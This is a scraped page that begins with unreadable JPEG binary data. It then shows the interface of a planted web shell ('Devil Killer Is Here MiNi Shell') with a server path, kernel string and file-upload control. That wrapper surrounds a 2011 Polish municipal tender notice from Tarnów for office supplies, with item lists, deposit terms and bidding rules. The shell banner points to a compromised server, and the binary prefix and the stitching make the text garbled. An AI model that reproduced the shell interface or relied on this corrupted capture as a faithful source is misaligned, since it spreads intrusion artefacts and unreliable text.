JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111221/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111221/340731-N-2011.html

<p class="kh_header"><b>Tarnów: Zakup materiałów biurowych dla potrzeb Wydziałów i Biur Urzędu Miasta Tarnowa</b><br>
<b>Numer ogłoszenia: 340731 - 2011; data zamieszczenia: 21.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Biuro Administracyjno-Gospodarcze w Centrum Obsługi Urzędu w Urzędzie Miasta Tarnowa , ul. Mickiewicza 2, 33-100 Tarnów, woj. małopolskie, tel. 14 6882400, faks 14 6215308.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup materiałów biurowych dla potrzeb Wydziałów i Biur Urzędu Miasta Tarnowa.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa materiałów biurowych dla potrzeb Wydziałów i Biur Urzędu Miasta Tarnowa w 2012 r. Szczegółowy wykaz materiałów objętych zamówieniem zawiera załącznik nr 1. Dostawy będą odbywały się do poszczególnych Wydziałów i Biur Urzędu Miasta Tarnowa, zlokalizowanych w budynkach przy ulicach: Nowa 3, Nowa 4, Goldhammera 3, Mickiewicza 2, Brodzińskiego 1, Gumniska 30 w dni powszednie w godzinach 8.00-15.00. 
Każdorazowo dostawy będą odbywały się na podstawie kierowanych do Dostawcy pisemnych zapotrzebowań, zawierających wskazanie asortymentu wraz z ilością. Zapotrzebowanie przesłane zostanie faksem najpóźniej w terminie do 10 dnia każdego miesiąca .
Zamawiający zastrzega sobie, że w przypadku konieczności zrealizowania pilnej dostawy, zapotrzebowanie może zostać skierowane do Dostawcy także w innym terminie. Każda dostawa musi zostać zrealizowana nie później niż w terminie do 3 dni roboczych od daty przekazania pisemnego zapotrzebowania Zamawiającego. 
l.P	 Kod CPV	Rodzaj produktu	Jednostka miary	Minimalna gwaranowana ilość zamawianych produktów 	Największy możliwy zakres zamawianych produktów z uwzględnieniem prawa opcji
			szt./opako wania/ryzy		 
1	2	3	4	5	6
1.	19521000-4	Półka na dokumenty w formacie do A4 wykonana z polistyrenu w kolorze przeźroczystym. Możliwość trwałego łączenia w pionie oraz przesuwania w poziomie: wymiary 250 x 345 x 60 mm	szt.	40	80
2.	19521000-4	Piórnik na materiały biurowe, obrotowy okrągły wykonany z przeźroczystego lub czarnego akrylu zawiera co najmniej 3 komory	szt.	3	5
3.	22114000-2	Zeszyt A-4 kratka 96 kart, twarda oprawa, okładki bez motywów obrazkowych	szt.	50	100
4.	22114000-2	Zeszyt A-5 kratka 60 kart, okładki bez motywów obrazkowych	szt.	50	100
5.	22114000-2	Zeszyt A-5 kratka 96 kart, twarda oprawa, okładki bez motywów obrazkowych.	szt.	20	30
6.	22600000-6	Tusz do pieczątek różne kolory: czerwony, czarny, bezolejowy w buteleczce z dozownikiem, pojemność 25 ml	szt.	60	120
7.	22600000-6	Tusz szybkoschnący do stempli metalowych R9	szt.	10	15
8.	22600000-6	Tusz olejowy do stempli metalowych różne kolory:czarny, czerwony- olejowy w buteleczce z dozownikiem, pojemność 25ml	szt	5	7
9.	22810000-1	Dziennik korespondencyjny format A4 96 kart, twarda oprawa	szt.	17	35
10.	22815000-6	Notatnik A-4 w kratkę 50 kart.	szt.	50	100
11.	22815000-6	Notatnik A-5 w kratkę 50 kart.	szt.	50	100
12.	22816000-3	Kostka kubikowa klejona biała 85 x 85 x 40 mm	szt.	300	600
13.	22816300-6	Zakładki indeksujące 20 x 50 mm, 4 jaskrawe kolory	szt.	70	100
14.	22816300-6	Kostka samoprzylepna 76 x 76 mm po 100 kartek	szt.	600	1000
15.	22851000-0	Skoroszyt zawieszkowy A-4 kartonowy, biały, czysty bez napisów wykonany z kartonu 250 g/m2 	szt.	6500	8000
16.	22851000-0	Skoroszyt zawieszkowy A-4 - plastikowy twardy z PCV przednia okładka przezroczysta, zaopatrzony w wymienny pasek papieru do opisu	szt.	2000	5000
17.	22851000-0	Skoroszyt kartonowy, zwykły - biały wykonany z kartonu 250 g/m2	szt.	250	300
18.	22852100-8	Koszulka zawieszkowa A-4 groszkowa (w opak. 100 szt.) wykonana z przezroczystej folii PP, grubość folii 48 mic, otwierana z góry 	opak.	150	200
19.	22852100-8	Koszulka zawieszkowa A-5 groszkowa (w opak. 100 szt.) wykonana z przeźroczystej folii PP, otwierana z góry, grubość folii 48 mic	opak.	10	15
20.	22852100-8	Koszulka zawieszkowa B-4 z klapką groszkowa (w opak. 10 szt.) wykonana z przeźroczystej folii, grubość folii 100 mic	opak.	10	20
21.	22852100-8	Ofertówka A4 przeźroczysta, sztywna wykonana z twardej folii PCV o wysokiej przeźoczystości i grubości folii 150 mic., zgrzewana w kształcie litery L	szt.	500	800
22.	22852100-8	Twarda okładka A4 na listy gratulacyjne w kolorze granatowym z tasiemką bez napisu 	szt.	500	700
23.	22990000-6	Okładka do bindowania A-4 - karton (w opak.100 szt.)	opak.	3	4
24.	24910000-6	Klej w sztyfcie 21 g - nietoksyczny z atestem PZH	szt.	600	1000
25.	30145100-8	Rolka barwiąca IR -40 T do kalkulatorów drukujących 	szt.	30	50
26.	30190000-7	Grzbiet plastikowy do bindowania 12 mm (w opak.100 szt.)	opak.	2	4
27.	30190000-7	Grzbiet plastikowy do bindowania 32 mm (w opak. 50 szt.)	opak.	2	4
28.	30190000-7	Grzbiet plastikowy do bindowania 16 mm (w opak.100 szt.)	opak.	2	4
29.	30191120-1	Pudełko kartonowe skośne A4/80 do przechowywania dokumentów w pozycji pionowej, szerokość grzbietu 80 mm	szt.	40	40
30.	30191130-4	Clipboard A-4 z okładką i klipsem na wewnętrznej stronie posiada kieszeń i miejsce na długopis	szt.	3	5
31.	30192000-1	Wkłady pasujące do długopisów z poz. 42 kolor niebieski, czarny	szt.	50	100
32.	30192000-1	Wkłady pasujący do długopisów samoprzylepnych z poz. 44 kolor niebieski	szt.	30	50
33.	30192000-1	Wkłady pasujące do długopisu z poz. 41, kolor niebieski, czarny	szt.	100	120
34.	30192000-1	Naboje pasujące do pióra Waterman (w opak. 8 szt.), kolor niebieski, czarny 	opak.	15	30
35.	30192000-1	Naboje atramentowe pasujące do pióra Parker (w opak. 5 szt ) kolor niebieski, czarny 	opak.	30	60
36.	30192000-1	Wkłady żelowe pasujące do długopisów z poz. 40, różne kolory	szt.	150	180
37.	30192000-1	Wkład pasujący do długopisu typu Zenit w kolorze: niebieski, czarny. Wkład musi spełniać nastepujące wymagania: wkład mosiężny, pokryty powłoką niklowaną,średnica kulki: 0,8 mm; długość linii pisania: min. 2500 m)	szt.	180	250
38.	30192100-2	Gumka do mazania miękka typu Factis s 20 lub równoważna rozmiar 5,5 x 2 x 1 cm (jako równoważna uznana zostanie gumka posiadająca podobne parametry miękości i ścieralności, pozwalająca na wymazywania grafitu i kredek rysunkowych, niebrudząca papieru) 	szt.	100	150
39.	30192111-2	Poduszka do stempli metalowych okrągła średnica 140 mm	szt.	3	5
40.	30192121-5	Długopis żelowy z wymiennym wkładem w różnych kolorach, grubość linii pisania 0,3 mm	szt.	150	310
41.	30192121-5	Długopis z wymiennym wkładem w przezroczystej obudowie z szybkoschnącym tuszem na bazie oleju. Długość linii pisania 1700m, grubość linii pisania 0,27 mm, końcówka 0,7 mm wykonana z niklowanego srebra	szt.	100	310
42.	30192121-5	Długopis żelowy typu Pilot G2 wymienny wkład automatyczy - chowany, czarny gumowy uchwyt w kolorze tuszu, klips i wykończenie w kolorze atramentu, grubość linii pisania 0,32 mm, dł.linii 1200 m lub równoważny (jako równoważny uznany zostanie długopis spełniający wyżej określone parametry)	szt.	50	100
43.	30192121-5	Długopis automatyczny wykonany z tworzywa sztucznego, z automatycznym mechanizmem włączającym wkład, z wymiennym wkładem niebieskim o średnicy kulki 0,8 mm, wykończenie niklowane lub metalowe (klips, okuwka i obrączka) długość linii pisania 2500 m 	szt.	100	150
44.	30192121-5	Długopis samoprzylepny na sprężynce z przyklejaną podstawką , wkład w kolorze niebieskim	szt.	50	80
45.	30192125-3	Zestaw 4 markerów do tablic suchościeralnych 	opak.	3	5
46.	30192125-3	Cienkopis w różnych kolorach z końcówką fibrową oprawioną w metal o grubości linii pisania 0,4 mm i długości linii pisania min. 1200 m, trwały tusz na bazie wody. Obudowa plastikowa, klips w kolorze tuszu	szt.	1000	1100
47.	30192125-3	Zakreślacz fluorescencyjny różne kolory z atramentem pigmentowym na bazie wody z końcówką ściętą o szerokości linii pisania 2,0-5,0 mm	szt.	400	700
48.	30192125-3	Pisak marker permanentny z okrągłą lub,ściętą końcówką różne kolory (czarny,czerwony ,niebieski) nietoksyczny grubość linii pisania 1,0-1,2 mm	szt.	200	350
49.	30192125-3	Foliopis wodoodporny napełniony niezmywalnym i szybkoschnącym atramentem w kolorze czarnym grubość linii pisania B 1,0 - 2,5 mm, permanenty 	szt.	10	20
50.	30192125-3	Foliopis wodoodporny napełniony niezmywalnym i szybkoschnącym atramentem w kolorze czarnym grubość S 0,4 mm permanenty 	szt.	50	100
51.	30192125-3	Foliopis wodoodporny napełniony niezmywalnym i szybkoschnącym atramentem w kolorze czarnym grubość linii pisania F 0,6 mm permanenty	szt.	50	105
52.	30192130-1	Ołówek drewniany biurowy HB 	szt.	300	500
53.	30192131-8	Ołówek automatyczny na grafity z wkładem, grubość linii pisania 0,5 mm	szt.	100	190
54.	30192132-5	Grafity do ołówków aut. HB 0,5 mm, 0,7 mm (12 grafitów w etuii)	opak.	110	110
55.	30192133-2	Temperówka do ołówków metalowa pojedyncza	szt.	60	120
56.	30192150-7	Datownik automatyczny samotuszującyw kolorze czerwonym w obudowie z tworzywa ABS z datą w wersji polskiej	szt.	15	30
57.	30192150-7	Datownik ręcznie przesuwany wys. czcionki 4 mm	szt.	3	3
58.	30192160-0	Korektor w taśmie nie zawierający rozpuszczalników szer. 5 mm dł. 8 m	szt.	100	200
59.	30192160-0	Korektor płynny w butelce z gąbką kryjącą na bazie wody, pojemność nie mniejsza niż 20 ml	szt.	100	150
60.	30192310-7	Taśma barwiąca dwukolorowa czerwono-czarna 13 mm x 6 m pasująca do kalkulatora typu Citizen 355 DPII 	szt.	15	30
61.	30192350-9	Rolki kasowe 57 mm x 30 m produkowane z białego, bezdrzewnego i bezpyłowego papieru offsetowego	szt.	200	400
62.	30192500-6	Okładka przezroczysta do bindowania (w opak. 100 szt.)	opak.	3	4
63.	30192910-3	Folia laminacyjna A-6 (w opak. 100 szt.)	opak.	5	5
64.	30192910-3	Folia laminacyjna A- 4 (w opak. 100 szt.)	opak.	9	11
65.	30192910-3	Folia laminacyjna A-5 (w opak. 100 szt.)	opak	2	2
66.	30194200-7	Taśma klejąca biurowa przezroczysta 18 mm x 30 mm 	szt.	150	300
67.	30194200-7	Taśma samoprzylepna dwustronna 50 mm x 5 m	szt.	20	50
68.	30194200-7	Taśma pakowa szeroka brązowa lub przezroczysta 50 mm x 66 m	szt.	40	65
69.	30194820-9	Ekierka plastikowa 25 cm	szt.	5	10
70.	30197100-7	Pinezki srebrne (w opak. 50 szt.)	opak.	5	20
71.	30197100-7	Zszywki metalowe pasujące do zszywacza typu Rexel Odyssey - rozmiar 9/13 w opak. 2500 szt. 	opak.	8	8
72.	30197100-7	Zszywki metalowe 24/6 do zszywaczy biurowych (w opak. 1000 szt.)	opak.	700	950
73.	30197100-7	Kasetka ze zszywkami 26/8 pasująca do zszywacza kasetowego Leitz 5551. Max. grubość zszywanego pliku: 4,0 mm. Max. ilość zszywanych kartek: 40 ark. (opakowanie: 1050 (5 x 210) szt.) 	opak.	3	5.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.76.44-2, 22.60.00.00-6, 22.81.60.00-3, 22.85.21.00-8, 30.19.20.00-1, 30.19.95.00-5, 30.19.92.30-1.</p>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawcy zaproszeni do udziału w licytacji zobowiązani będą do wniesienia wadium w wysokości 1 400,00 zł w terminie wskazanym w zaproszeniu do wzięcia udziału w licytacji elektronicznej. Wadium może być wniesione w formach określonych w art. 45 ust. 6 ustawy Prawo zamówień publicznych, z zastrzeżeniem art. 45 ust. 7 ustawy PZP. 
III.1.1) Wadium w pieniądzu należy wnieść przelewem na konto: Bank Handlowy O/Tarnów nr 76 1030 1250 0000 0000 8800 0099, z zaznaczeniem na dowodzie wpłaty: Wadium -Zakup materiałów biurowych dla potrzeb Wydziałów i Biur Urzędu Miasta Tarnowa. Wadium musi znaleźć się na koncie Zamawiającego nie później niż w dniu i w godzinie wskazanej w zaproszeniu do wzięcia udziału w licytacji elektronicznej. 
III.1.2) W razie wyboru formy wniesienia wadium innej niż pieniądz oryginał dokumentu należy złożyć w w Urzędzie Miasta Tarnowa, ul. Nowa 4, 33-100 Tarnów, pok. 113
do dnia i godziny wskazanej w zaproszeniu do wzięcia udziału w licytacji elektronicznej. -III.1.3) Wadium wniesione w pieniądzu Zamawiający zwróci wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz koszty prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.
III.1.4) Wykonawca, którego oferta zostanie wybrana traci wadium wraz z odsetkami na rzecz Zamawiającego, w przypadkach określonych w art. 46 ust. 5 pkt 1 i pkt 3 ustawy pzp.
III.1.5) Wykonawca, który nie wniesie wadium w wyznaczonym terminie, nie zostanie dopuszczony do licytacji.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku.
Ocena spełnienia warunku odbędzie się na podstawie analizy treści oświadczenia , o którym mowa w pkt. III.4.1.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku.
Ocena spełnienia warunku odbędzie się na podstawie analizy treści oświadczenia , o którym mowa w pkt. III.4.1.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku.
Ocena spełnienia warunku odbędzie się na podstawie analizy treści oświadczenia , o którym mowa w pkt. III.4.1.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku.
Ocena spełnienia warunku odbędzie się na podstawie analizy treści oświadczenia , o którym mowa w pkt. III.4.1.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku.
Ocena spełnienia warunku odbędzie się na podstawie analizy treści oświadczenia , o którym mowa w pkt. III.4.1.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. III.4.3.1) zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania (wystawionym nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert).
2.	W celu wykazania, że Wykonawca nie podlega wykluczeniu z postępowania na podstawie art. 24 ust. 2 ustawy, przedkłada on dokumenty i oświadczenia określone w pkt III.4.1.
3.	Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia (art. 26 ust. 2b ustawy Pzp).
4.	W przypadku, gdy uprawnienie do podpisania oferty nie wynika z dokumentów przedłożonych w ofercie , do oferty dodatkowo należy załączyć stosowne upoważnienie. Upoważnienia złożone do przetargu mają być podpisane przez osobę upoważnioną do zaciągania zobowiązań cywilno-prawnych w imieniu Wykonawcy. Upoważnienia/ pełnomocnictwa należy przedstawić w formie oryginału lub kopii poświadczonej notarialnie.
5.	W przypadku, gdy odrębne przepisy wymagają zgłoszenia do ewidencji działalności gospodarczej celem wykazania, że oferta została złożona i podpisana przez osobę uprawnioną i właściwie umocowaną, Wykonawca przedkłada zaświadczenie
(a w przypadku spółki cywilnej - zaświadczenia) o wpisie do ewidencji działalności gospodarczej (w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> licytacja elektroniczna.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian:
Zamawiający przewiduje możliwość dokonania zmian postanowień umowy w przypadkach:
a)	zmiany stawek podatku od towarów i usług - w takim przypadku wynagrodzenie wykonawcy zostanie odpowiednio pomniejszone lub powiększone,
b)	przekształceń wykonawcy lub zbycia przedsiębiorstwa,
c)	zmiany danych adresowych Stron lub zmiany rachunku bankowego Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>

<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.4.6) Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:</b> licytacje.uzp.gov.pl.</p>
<p><b>IV.4.7) Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:</b> http://portal.tarnow.bip-gov.info.pl/bip/</p>
<p><b>IV.4.8) Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:</b> IV.4.8.1) Wykonawcy chcący wziąć udział w przedmiotowej licytacji są zobowiązani do dokonania uprzedniej rejestracji na platformie do prowadzenia licytacji elektronicznych, zwanej dalej platformą, oraz do przesłania swojego LOGIN-u Zamawiającemu, wypełniając informację we wniosku o dopuszczenie do udziału w licytacji elektronicznej. Wniosek o dopuszczenie do udziału w licytacji elektronicznej stanowi załącznik nr 2 do ogłoszenia.
IV.4.8.2) Korzystanie z oprogramowania jest bezpłatne. Jedynym warunkiem jest zarejestrowanie się w systemie.
IV.4.8.3) Przed rozpoczęciem korzystania z platformy zaleca się zapoznanie się z Samouczkiem oraz z wersją demonstracyjną platformy, zamieszczonymi na stronie internetowej, na której będzie prowadzona licytacja elektroniczna.
IV.4.8.4) Pomoc techniczną w zakresie funkcjonowania systemu (zgłaszanie ew. błędów) można uzyskać po numerem telefonu (22) 632 28 84.
IV.4.8.5) Udział w licytacji elektronicznej wymaga dysponowania komputerem PC z systemem operacyjnym Windows/Linux oraz przeglądarką internetową Internet Explorer 6.0 lub wyższą lub Firefox 2.0 lub wyższą.
IV.4.8.6) Zamawiający dopuści do udziału w licytacji elektronicznej i zaprosi do składania ofert wszystkich wykonawców, którzy spełnią warunki udziału w postępowaniu, określając w zaproszeniu termin związania ofertą wykonawcy (30 dni), który zaoferuje najniższą cenę..</p>
